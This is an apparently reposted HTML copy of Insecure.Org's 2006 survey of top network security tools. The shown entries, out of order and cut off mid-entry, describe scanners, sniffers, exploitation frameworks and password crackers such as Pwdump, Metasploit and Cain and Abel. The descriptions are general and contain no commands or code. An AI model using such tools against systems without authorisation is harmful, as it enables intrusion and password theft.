<p>See all <a href="http://sectools.org/sniffers.html">packet sniffers</a>, and <a href="http://sectools.org/traffic-monitors.html">traffic monitoring tools</a> </p></td></tr></tbody></table><hr /><a name="impact"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#44</span><br /><img src="http://mirror.sectools.org/flags/new_28x11.gif" alt="new" width="28" height="11" /><br /><img src="http://mirror.sectools.org/flags/dollarlogo_20x30.gif" alt="Costs money" title="Costs money" width="20" height="30" /><br /><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/mouse-30x30.png" alt="GUI Interface" title="GUI Interface" width="30" height="30" /> </td><td valign="top"> <a href="http://www.coresecurity.com/products/coreimpact/"><img src="http://mirror.sectools.org/logos/impact-80x50.gif" align="right" border="0" width="80" height="50" /></a> <a href="http://www.coresecurity.com/products/coreimpact/">Core Impact</a> : An automated, comprehensive penetration testing product<br />Core Impact isn't cheap (be prepared to spend tens of thousands of dollars), but it is widely considered to be the most powerful exploitation tool available. It sports a large, regularly updated database of professional exploits, and can do neat tricks like exploiting one machine and then establishing an encrypted tunnel through that machine to reach and exploit other boxes. If you can't afford Impact, take a look at the cheaper <a href="http://sectools.org/tools4.html#canvas">Canvas</a> or the excellent and free <a href="http://sectools.org/index.html#metasploit">Metasploit Framework</a>. Your best bet is to use all three. 
<p>See all <a href="http://sectools.org/vuln-scanners.html">vulnerability scanners</a>, and <a href="http://sectools.org/sploits.html">vulnerability exploitation tools</a> </p></td></tr></tbody></table><hr /><a name="ida"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#45</span><br /><img src="http://mirror.sectools.org/flags/new_28x11.gif" alt="new" width="28" height="11" /><br /><img src="http://mirror.sectools.org/flags/dollarlogo_20x30.gif" alt="Costs money" title="Costs money" width="20" height="30" /><br /><img src="http://mirror.sectools.org/flags/linuxpenguinlogo_30x30.gif" alt="Linux" title="Runs on Linux" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/mouse-30x30.png" alt="GUI Interface" title="GUI Interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/magnifying-glass-30x19.png" alt="Source code" title="Source code available" width="30" height="19" /> </td><td valign="top"> <a href="http://www.datarescue.com/idabase/"><img src="http://mirror.sectools.org/logos/ida-58x57.png" align="right" border="0" width="58" height="57" /></a> <a href="http://www.datarescue.com/idabase/">IDA Pro</a> : A Windows or Linux disassembler and debugger<br />Disassembly is a big part of security research. It will help you dissect that Microsoft patch to discover the silently fixed bugs they don't tell you about, or more closely examine a server binary to determine why your exploit isn't working. Many disassemblers are available, but IDA Pro has become the de-facto standard for the analysis of hostile code and vulnerability research. This interactive, programmable, extensible, multi-processor disassembler now supports Linux (console mode) as well as Windows. 
<p>See all <a href="http://sectools.org/disassemblers.html">disassemblers</a> </p></td></tr></tbody></table><hr /><a name="solarwinds"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#46</span><br /><img src="http://mirror.sectools.org/flags/down_r_10x14.gif" width="10" height="14" /><span style="color:#cc0000;">12</span><br /><img src="http://mirror.sectools.org/flags/dollarlogo_20x30.gif" alt="Costs money" title="Costs money" width="20" height="30" /><br /><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/mouse-30x30.png" alt="GUI Interface" title="GUI Interface" width="30" height="30" /> </td><td valign="top"> <a href="http://www.solarwinds.net/"><img src="http://mirror.sectools.org/logos/solarwinds-80x47.png" align="right" border="0" width="80" height="47" /></a> <a href="http://www.solarwinds.net/">SolarWinds</a> : A plethora of network discovery/monitoring/attack tools<br />SolarWinds has created and sells dozens of special-purpose tools targeted at systems administrators. Security-related tools include many network discovery scanners, an SNMP brute-force cracker, router password decryption, a TCP connection reset program, one of the fastest and easiest router config download/upload applications available and more. 
<p>See all <a href="http://sectools.org/traffic-monitors.html">traffic monitoring tools</a>, and <a href="http://sectools.org/crackers.html">password crackers</a> </p></td></tr></tbody></table><hr /><a name="pwdump"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#47</span><br /><img src="http://mirror.sectools.org/flags/up_g_10x14.gif" width="10" height="14" /><span style="color:#008800;">6</span><br /><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/term-30x30.png" alt="Command-line interface" title="Command-line interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/magnifying-glass-30x19.png" alt="Source code" title="Source code available" width="30" height="19" /> </td><td valign="top"> <a href="http://www.foofus.net/fizzgig/pwdump/">Pwdump</a> : A Windows password recovery tool<br />Pwdump is able to extract NTLM and LanMan hashes from a Windows target, regardless of whether Syskey is enabled. It is also capable of displaying password histories if they are available. It outputs the data in L0phtcrack-compatible form, and can write to an output file. 
<p>See all <a href="http://sectools.org/crackers.html">password crackers</a> </p></td></tr></tbody></table><hr /><a name="lsof"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#48</span><br /><img src="http://mirror.sectools.org/flags/down_r_10x14.gif" width="10" height="14" /><span style="color:#cc0000;">7</span><br /><img src="http://mirror.sectools.org/flags/linuxpenguinlogo_30x30.gif" alt="Linux" title="Runs on Linux" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/openbsdheadlogo_30x30.gif" alt="*BSD" title="Runs on *BSD" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/osx-30x30.png" alt="OS X" title="Runs on Mac OS X" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/term-30x30.png" alt="Command-line interface" title="Command-line interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/magnifying-glass-30x19.png" alt="Source code" title="Source code available" width="30" height="19" /> </td><td valign="top"> <a href="ftp://vic.cc.purdue.edu/pub/tools/unix/lsof/">LSoF</a> : LiSt Open Files<br />This Unix-specific diagnostic and forensics tool lists information about any files that are open by processes currently running on the system. It can also list communications sockets open by each process. For a Windows equivalent, check out Process Explorer from <a href="http://sectools.org/index.html#sysinternals">Sysinternals</a>. 
</td></tr></tbody></table><hr /><a name="rainbowcrack"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#49</span><br /><img src="http://mirror.sectools.org/flags/new_28x11.gif" alt="new" width="28" height="11" /><br /><img src="http://mirror.sectools.org/flags/linuxpenguinlogo_30x30.gif" alt="Linux" title="Runs on Linux" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/openbsdheadlogo_30x30.gif" alt="*BSD" title="Runs on *BSD" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/osx-30x30.png" alt="OS X" title="Runs on Mac OS X" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/term-30x30.png" alt="Command-line interface" title="Command-line interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/magnifying-glass-30x19.png" alt="Source code" title="Source code available" width="30" height="19" /> </td><td valign="top"> <a href="http://www.antsight.com/zsl/rainbowcrack/">RainbowCrack</a> : An Innovative Password Hash Cracker<br />The RainbowCrack tool is a hash cracker that makes use of a large-scale time-memory trade-off. A traditional brute force cracker tries all possible plaintexts one by one, which can be time consuming for complex passwords. RainbowCrack uses a time-memory trade-off to do all the cracking-time computation in advance and store the results in so-called "rainbow tables". It does take a long time to precompute the tables but RainbowCrack can be hundreds of times faster than a brute force cracker once the precomputation is finished. 
<p>See all <a href="http://sectools.org/crackers.html">password crackers</a> </p></td></tr></tbody></table><hr /><a name="firewalk"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#50</span><br /><img src="http://mirror.sectools.org/flags/down_r_10x14.gif" width="10" height="14" /><span style="color:#cc0000;">19</span><br /><img src="http://mirror.sectools.org/flags/linuxpenguinlogo_30x30.gif" alt="Linux" title="Runs on Linux" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/openbsdheadlogo_30x30.gif" alt="*BSD" title="Runs on *BSD" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/osx-30x30.png" alt="OS X" title="Runs on Mac OS X" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/term-30x30.png" alt="Command-line interface" title="Command-line interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/magnifying-glass-30x19.png" alt="Source code" title="Source code available" width="30" height="19" /> </td><td valign="top"> <a href="http://www.packetfactory.net/projects/firewalk/"><img src="http://mirror.sectools.org/logos/firewalk-80x17.png" align="right" border="0" width="80" height="17" /></a> <a href="http://www.packetfactory.net/projects/firewalk/">Firewalk</a> : Advanced traceroute<br />Firewalk employs traceroute-like techniques to analyze IP packet responses to determine gateway ACL filters and map networks. This classic tool was rewritten from scratch in October 2002. Note that much or all of this functionality can also be performed by the <a href="http://sectools.org/index.html#hping">Hping2</a> --traceroute option. <p>See all <a href="http://sectools.org/traceroutes.html">traceroute</a></p></td></tr></tbody></table>Praba.... 
a Hacker......<br />Published 2009-07-29T05:24:00.001-07:00, updated 2009-07-29T05:24:43.823-07:00<br />Top 100 Network Security Tools 1-25<p>After the tremendously successful <a href="http://sectools.org/tools2000.html">2000</a> and <a href="http://sectools.org/tools2003.html">2003</a> security tools surveys, <a href="http://www.insecure.org/">Insecure.Org</a> is delighted to release this 2006 survey. I (<a href="http://insecure.org/fyodor/">Fyodor</a>) asked users from the <a href="http://seclists.org/#nmap-hackers">nmap-hackers</a> mailing list to share their favorite tools, and 3,243 people responded. This allowed me to expand the list to 100 tools, and even subdivide them into categories. Anyone in the security field would be well advised to go over the list and investigate tools they are unfamiliar with. I discovered several powerful new tools this way. I also point newbies to this site whenever they write me saying “I don't know where to start”. </p><p>Respondents were allowed to list open source or commercial tools on any platform. Commercial tools are noted as such in the list below. No votes for the <a href="http://insecure.org/nmap/">Nmap Security Scanner</a> were counted because the survey was taken on an Nmap mailing list. This audience also biases the list slightly toward “attack” hacking tools rather than defensive ones. 
</p><p>Each tool is described by one or more attributes: <table> <tbody><tr><td align="center"><img src="http://mirror.sectools.org/flags/new_28x11.gif" alt="new" title="New" width="28" height="11" /></td><td valign="center">Did not appear on the <a href="http://sectools.org/tools2003.html">2003 list</a></td></tr> <tr><td align="center"><img src="http://mirror.sectools.org/flags/up_g_10x14.gif" width="10" height="14" />/<img src="http://mirror.sectools.org/flags/down_r_10x14.gif" width="10" height="14" /></td><td valign="center">Popularity ranking <img src="http://mirror.sectools.org/flags/up_g_10x14.gif" width="10" height="14" /><span style="color:#008800;">rose</span> / <img src="http://mirror.sectools.org/flags/down_r_10x14.gif" width="10" height="14" /><span style="color:#cc0000;">fell</span> the given number since the <a href="http://sectools.org/tools2003.html">2003 survey</a></td></tr> <tr><td align="center"><img src="http://mirror.sectools.org/flags/dollarlogo_20x30.gif" alt=" TITLE=" costs="" money="" width="20" height="30" /></td><td valign="center">Generally costs money. 
A free limited/demo/trial version may be available.</td></tr> <tr><td align="center"><img src="http://mirror.sectools.org/flags/linuxpenguinlogo_30x30.gif" alt="Linux" title="Runs on Linux" width="30" height="30" /></td><td valign="center">Works natively on Linux</td></tr> <tr><td align="center"><img src="http://mirror.sectools.org/flags/openbsdheadlogo_30x30.gif" alt="*BSD" title="Runs on *BSD" width="30" height="30" /></td><td valign="center">Works natively on OpenBSD, FreeBSD, Solaris, and/or other UNIX variants</td></tr> <tr><td align="center"><img src="http://mirror.sectools.org/flags/osx-30x30.png" alt="OS X" title="Runs on Mac OS X" width="30" height="30" /></td><td valign="center">Works natively on Apple Mac OS X</td></tr> <tr><td align="center"><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /></td><td valign="center">Works natively on Microsoft Windows</td></tr> <tr><td align="center"><img src="http://mirror.sectools.org/flags/term-30x30.png" alt="Command-line interface" title="Command-line interface" width="30" height="30" /></td><td valign="center">Features a command-line interface</td></tr> <tr><td align="center"><img src="http://mirror.sectools.org/flags/mouse-30x30.png" alt="GUI Interface" title="GUI Interface" width="30" height="30" /></td><td valign="center">Offers a GUI (point and click) interface</td></tr> <tr><td align="center"><img src="http://mirror.sectools.org/flags/magnifying-glass-30x19.png" alt="Source code" title="Source code available" width="30" height="19" /></td><td valign="center">Source code available for inspection.</td></tr> </tbody></table> </p><p>Please send updates and suggestions (or better tool logos) to <a href="mailto:fyodor@insecure.org">Fyodor</a>. If your tool is featured or you think your site visitors might enjoy this list, you are welcome to use our <a href="http://sectools.org/banners.html">link banners</a>. 
Here is the list, starting with the most popular:<br /><br /><a name="nessus"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#1</span><br /><img src="http://mirror.sectools.org/flags/dollarlogo_20x30.gif" alt=" TITLE=" costs="" money="" width="20" height="30" /><br /><img src="http://mirror.sectools.org/flags/linuxpenguinlogo_30x30.gif" alt="Linux" title="Runs on Linux" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/openbsdheadlogo_30x30.gif" alt="*BSD" title="Runs on *BSD" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/osx-30x30.png" alt="OS X" title="Runs on Mac OS X" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/mouse-30x30.png" alt="GUI Interface" title="GUI Interface" width="30" height="30" /> </td><td valign="top"> <a href="http://www.nessus.org/"><img src="http://mirror.sectools.org/logos/nessus-80x77.png" align="right" border="0" width="80" height="77" /></a> <a href="http://www.nessus.org/">Nessus</a> : Premier UNIX vulnerability assessment tool<br />Nessus was a popular free and open source vulnerability scanner until they <a href="http://www.linux.com/articles/48745">closed the source code</a> in 2005 and <a href="http://sectools.org/stf/nessus_feed_letter.pdf">removed the free "registered feed" version</a> in 2008. A limited “Home Feed” is still available, though it is only licensed for home network use. Some people avoid paying by violating the “Home Feed” license, or by avoiding feeds entirely and using just the plugins included with each release. But for most users, the cost has increased from free to $1200/year. Despite this, Nessus is still the best UNIX vulnerability scanner available and among the best to run on Windows. Nessus is constantly updated, with more than 20,000 plugins. 
Key features include remote and local (authenticated) security checks, a client/server architecture with a GTK graphical interface, and an embedded scripting language for writing your own plugins or understanding the existing ones. <p>See all <a href="http://sectools.org/vuln-scanners.html">vulnerability scanners</a> </p></td></tr></tbody></table></p><hr /><a name="wireshark"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#2</span><br /><img src="http://mirror.sectools.org/flags/linuxpenguinlogo_30x30.gif" alt="Linux" title="Runs on Linux" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/openbsdheadlogo_30x30.gif" alt="*BSD" title="Runs on *BSD" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/osx-30x30.png" alt="OS X" title="Runs on Mac OS X" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/term-30x30.png" alt="Command-line interface" title="Command-line interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/mouse-30x30.png" alt="GUI Interface" title="GUI Interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/magnifying-glass-30x19.png" alt="Source code" title="Source code available" width="30" height="19" /> </td><td valign="top"> <a href="http://www.wireshark.org/"><img src="http://mirror.sectools.org/logos/wireshark-80x144.png" align="right" border="0" width="80" height="144" /></a> <a href="http://www.wireshark.org/">Wireshark</a> : Sniffing the glue that holds the Internet together<br />Wireshark (known as Ethereal until a trademark dispute in Summer 2006) is a fantastic open source network protocol analyzer for Unix and Windows. It allows you to examine data from a live network or from a capture file on disk. 
You can interactively browse the capture data, delving down into just the level of packet detail you need. Wireshark has several powerful features, including a rich display filter language and the ability to view the reconstructed stream of a TCP session. It also supports hundreds of protocols and media types. A tcpdump-like console version named tethereal is included. One word of caution is that Ethereal has suffered from dozens of remotely exploitable security holes, so stay up-to-date and be wary of running it on untrusted or hostile networks (such as security conferences). <p>See all <a href="http://sectools.org/sniffers.html">packet sniffers</a> </p></td></tr></tbody></table><hr /><a name="snort"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#3</span><br /><img src="http://mirror.sectools.org/flags/dollarlogo_20x30.gif" alt=" TITLE=" costs="" money="" width="20" height="30" /><br /><img src="http://mirror.sectools.org/flags/linuxpenguinlogo_30x30.gif" alt="Linux" title="Runs on Linux" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/openbsdheadlogo_30x30.gif" alt="*BSD" title="Runs on *BSD" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/osx-30x30.png" alt="OS X" title="Runs on Mac OS X" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/term-30x30.png" alt="Command-line interface" title="Command-line interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/magnifying-glass-30x19.png" alt="Source code" title="Source code available" width="30" height="19" /> </td><td valign="top"> <a href="http://www.snort.org/"><img src="http://mirror.sectools.org/logos/snort-80x62.png" align="right" border="0" width="80" height="62" /></a> <a href="http://www.snort.org/">Snort</a> : Everyone's favorite 
open source IDS<br />This lightweight network intrusion detection and prevention system excels at traffic analysis and packet logging on IP networks. Through protocol analysis, content searching, and various pre-processors, Snort detects thousands of worms, vulnerability exploit attempts, port scans, and other suspicious behavior. Snort uses a flexible rule-based language to describe traffic that it should collect or pass, and a modular detection engine. Also check out the free <a href="http://secureideas.sourceforge.net/">Basic Analysis and Security Engine (BASE)</a>, a web interface for analyzing Snort alerts. <p>Open source Snort works fine for many individuals, small businesses, and departments. Parent company <a href="http://www.sourcefire.com/">SourceFire</a> offers a complementary product line with more enterprise-level features and real-time rule updates. They offer a free (with registration) 5-day-delayed rules feed, and you can also find many great free rules at <a href="http://www.bleedingsnort.com/">Bleeding Edge Snort</a>. 
</p><p>See all <a href="http://sectools.org/ids.html">intrusion detection systems</a> </p></td></tr></tbody></table><hr /><a name="netcat"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#4</span><br /><img src="http://mirror.sectools.org/flags/linuxpenguinlogo_30x30.gif" alt="Linux" title="Runs on Linux" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/openbsdheadlogo_30x30.gif" alt="*BSD" title="Runs on *BSD" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/osx-30x30.png" alt="OS X" title="Runs on Mac OS X" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/term-30x30.png" alt="Command-line interface" title="Command-line interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/magnifying-glass-30x19.png" alt="Source code" title="Source code available" width="30" height="19" /> </td><td valign="top"> <a href="http://www.vulnwatch.org/netcat/"><img src="http://mirror.sectools.org/logos/netcat-80x155.png" align="right" border="0" width="80" height="155" /></a> <a href="http://www.vulnwatch.org/netcat/">Netcat</a> : The network Swiss army knife<br />This simple utility reads and writes data across TCP or UDP network connections. It is designed to be a reliable back-end tool that can be used directly or easily driven by other programs and scripts. At the same time, it is a feature-rich network debugging and exploration tool, since it can create almost any kind of connection you would need, including port binding to accept incoming connections. The original Netcat was <a href="http://seclists.org/bugtraq/1995/Oct/0028.html">released</a> by Hobbit in 1995, but it hasn't been maintained despite its immense popularity. 
It can sometimes even be hard to find <a href="http://download.insecure.org/stf/nc110.tgz">nc110.tgz</a>. The flexibility and usefulness of this tool have prompted people to write numerous other Netcat implementations - often with modern features not found in the original. One of the most interesting is <a href="http://sectools.org/tools3.html#socat">Socat</a>, which extends Netcat to support many other socket types, SSL encryption, SOCKS proxies, and more. It even made this list on its own merits. There is also <a href="http://sourceforge.net/projects/nmap-ncat/">Chris Gibson's Ncat</a>, which offers even more features while remaining portable and compact. Other takes on Netcat include <a href="http://www.openbsd.org/cgi-bin/cvsweb/src/usr.bin/nc/">OpenBSD's nc</a>, <a href="http://farm9.org/Cryptcat/">Cryptcat</a>, <a href="http://www.deepspace6.net/projects/netcat6.html">Netcat6</a>, <a href="http://dcs.nac.uci.edu/%7Estrombrg/pnetcat.html">PNetcat</a>, <a href="http://tigerteam.se/dl/sbd/">SBD</a>, and so-called <a href="http://netcat.sourceforge.net/">GNU Netcat</a>. 
<p>See all <a href="http://sectools.org/netcats.html">Netcats</a> </p></td></tr></tbody></table><hr /><a name="metasploit"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#5</span><br /><img src="http://mirror.sectools.org/flags/new_28x11.gif" alt="new" width="28" height="11" /><br /><img src="http://mirror.sectools.org/flags/linuxpenguinlogo_30x30.gif" alt="Linux" title="Runs on Linux" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/openbsdheadlogo_30x30.gif" alt="*BSD" title="Runs on *BSD" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/osx-30x30.png" alt="OS X" title="Runs on Mac OS X" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/term-30x30.png" alt="Command-line interface" title="Command-line interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/magnifying-glass-30x19.png" alt="Source code" title="Source code available" width="30" height="19" /> </td><td valign="top"> <a href="http://www.metasploit.com/"><img src="http://mirror.sectools.org/logos/metasploit-40x69.png" align="right" border="0" width="40" height="69" /></a> <a href="http://www.metasploit.com/">Metasploit Framework</a> : Hack the Planet<br />Metasploit took the security world by storm when it was released in 2004. No other new tool even broke into the top 15 of this list, yet Metasploit comes in at #5, ahead of many well-loved tools that have been developed for more than a decade. It is an advanced open-source platform for developing, testing, and using exploit code. The extensible model through which payloads, encoders, no-op generators, and exploits can be integrated has made it possible to use the Metasploit Framework as an outlet for cutting-edge exploitation research. 
It ships with hundreds of exploits, as you can see in their <a href="http://metasploit.com:55555/">online exploit building demo</a>. This makes writing your own exploits easier, and it certainly beats scouring the darkest corners of the Internet for illicit shellcode of dubious quality. Similar professional exploitation tools, such as <a href="http://sectools.org/tools2.html#impact">Core Impact</a> and <a href="http://sectools.org/tools4.html#canvas">Canvas</a> already existed for wealthy users on all sides of the ethical spectrum. Metasploit simply brought this capability to the masses. <p>See all <a href="http://sectools.org/sploits.html">vulnerability exploitation tools</a> </p></td></tr></tbody></table><hr /><a name="hping"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#6</span><br /><img src="http://mirror.sectools.org/flags/linuxpenguinlogo_30x30.gif" alt="Linux" title="Runs on Linux" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/openbsdheadlogo_30x30.gif" alt="*BSD" title="Runs on *BSD" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/osx-30x30.png" alt="OS X" title="Runs on Mac OS X" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/term-30x30.png" alt="Command-line interface" title="Command-line interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/magnifying-glass-30x19.png" alt="Source code" title="Source code available" width="30" height="19" /> </td><td valign="top"> <a href="http://www.hping.org/"><img src="http://mirror.sectools.org/logos/hping-80x31.png" align="right" border="0" width="80" height="31" /></a> <a href="http://www.hping.org/">Hping2</a> : A network probing utility like ping on steroids<br />This handy little utility assembles and sends custom ICMP, UDP, or 
TCP packets and then displays any replies. It was inspired by the ping command, but offers far more control over the probes sent. It also has a handy traceroute mode and supports IP fragmentation. This tool is particularly useful when trying to traceroute/ping/probe hosts behind a firewall that blocks attempts using the standard utilities. This often allows you to map out firewall rulesets. It is also great for learning more about TCP/IP and experimenting with IP protocols. <p>See all <a href="http://sectools.org/packet-crafters.html">packet crafting tools</a> </p></td></tr></tbody></table><hr /><a name="kismet"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#7</span><br /><img src="http://mirror.sectools.org/flags/up_g_10x14.gif" width="10" height="14" /><span style="color:#008800;">10</span><br /><img src="http://mirror.sectools.org/flags/linuxpenguinlogo_30x30.gif" alt="Linux" title="Runs on Linux" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/openbsdheadlogo_30x30.gif" alt="*BSD" title="Runs on *BSD" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/osx-30x30.png" alt="OS X" title="Runs on Mac OS X" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/term-30x30.png" alt="Command-line interface" title="Command-line interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/magnifying-glass-30x19.png" alt="Source code" title="Source code available" width="30" height="19" /> </td><td valign="top"> <a href="http://www.kismetwireless.net/"><img src="http://mirror.sectools.org/logos/kismet-80x46.png" align="right" border="0" width="80" height="46" /></a> <a href="http://www.kismetwireless.net/">Kismet</a> : A powerful wireless sniffer<br />Kismet is a console (ncurses) based 802.11 layer2 
wireless network detector, sniffer, and intrusion detection system. It identifies networks by passively sniffing (as opposed to more active tools such as <a href="http://sectools.org/index.html#netstumbler">NetStumbler</a>), and can even decloak hidden (non-beaconing) networks if they are in use. It can automatically detect network IP blocks by sniffing TCP, UDP, ARP, and DHCP packets, log traffic in Wireshark/TCPDump compatible format, and even plot detected networks and estimated ranges on downloaded maps. As you might expect, this tool is commonly used for <a href="http://en.wikipedia.org/wiki/Wardriving">wardriving</a>. Oh, and also <a href="http://en.wikipedia.org/wiki/Warwalking">warwalking</a>, <a href="http://www.tgdaily.com/2004/04/30/thg_takes_to_the_air_for_wi/print.html">warflying</a>, and <a href="http://www.oldskoolphreak.com/tfiles/wifi/warskating/warskating.html">warskating</a>, ... <p>See all <a href="http://sectools.org/wireless.html">wireless tools</a>, and <a href="http://sectools.org/sniffers.html">packet sniffers</a> </p></td></tr></tbody></table><hr /><a name="tcpdump"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#8</span><br /><img src="http://mirror.sectools.org/flags/down_r_10x14.gif" width="10" height="14" /><span style="color:#cc0000;">3</span><br /><img src="http://mirror.sectools.org/flags/linuxpenguinlogo_30x30.gif" alt="Linux" title="Runs on Linux" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/openbsdheadlogo_30x30.gif" alt="*BSD" title="Runs on *BSD" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/osx-30x30.png" alt="OS X" title="Runs on Mac OS X" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/term-30x30.png" alt="Command-line interface" title="Command-line interface" width="30" 
height="30" /><br /><img src="http://mirror.sectools.org/flags/magnifying-glass-30x19.png" alt="Source code" title="Source code available" width="30" height="19" /> </td><td valign="top"> <a href="http://www.tcpdump.org/"><img src="http://mirror.sectools.org/logos/tcpdump-80x70.png" align="right" border="0" width="80" height="70" /></a> <a href="http://www.tcpdump.org/">Tcpdump</a> : The classic sniffer for network monitoring and data acquisition<br />Tcpdump is the IP sniffer we all used before Ethereal (Wireshark) came on the scene, and many of us continue to use it frequently. It may not have the bells and whistles (such as a pretty GUI or parsing logic for hundreds of application protocols) that Wireshark has, but it does the job well and with fewer security holes. It also requires fewer system resources. While it doesn't receive new features often, it is actively maintained to fix bugs and portability problems. It is great for tracking down network problems or monitoring activity. There is a separate Windows port named <a href="http://windump.polito.it/">WinDump</a>. TCPDump is the source of the <a href="http://www.tcpdump.org/">Libpcap</a>/<a href="http://winpcap.polito.it/">WinPcap</a> packet capture library, which is used by <a href="http://insecure.org/nmap/">Nmap</a> among many other tools. 
<p>See all <a href="http://sectools.org/sniffers.html">packet sniffers</a> </p></td></tr></tbody></table><hr /><a name="cain"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#9</span><br /><img src="http://mirror.sectools.org/flags/up_g_10x14.gif" width="10" height="14" /><span style="color:#008800;">23</span><br /><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/mouse-30x30.png" alt="GUI Interface" title="GUI Interface" width="30" height="30" /> </td><td valign="top"> <a href="http://www.oxid.it/cain.html"><img src="http://mirror.sectools.org/logos/cain-80x32.png" align="right" border="0" width="80" height="32" /></a> <a href="http://www.oxid.it/cain.html">Cain and Abel</a> : The top password recovery tool for Windows<br />UNIX users often smugly assert that the best free security tools support their platform first, and Windows ports are often an afterthought. They are usually right, but Cain & Abel is a glaring exception. This Windows-only password recovery tool handles an enormous variety of tasks. It can recover passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, revealing password boxes, uncovering cached passwords and analyzing routing protocols. It is also <a 